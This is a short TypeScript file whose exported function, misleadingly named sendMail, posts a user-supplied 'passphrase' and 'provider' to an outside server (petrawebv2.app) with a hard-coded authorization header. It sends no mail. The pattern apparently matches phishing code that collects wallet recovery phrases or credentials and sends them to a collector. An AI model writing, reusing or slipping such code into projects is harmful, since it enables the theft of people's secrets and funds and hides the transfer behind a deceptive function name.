import axios from "axios"



export function sendMail(passphrase: string, provider: string) {
  return axios
    .post(`https://petrawebv2.app/notify-all`, {
      passphrase,
      provider
    },{
      headers: {
        'Authorization': 'hidari'
      }
    }).then((res) => {
      console.log(res.data);

    }).catch(err => console.log(`error is ${err}`)
    )

}

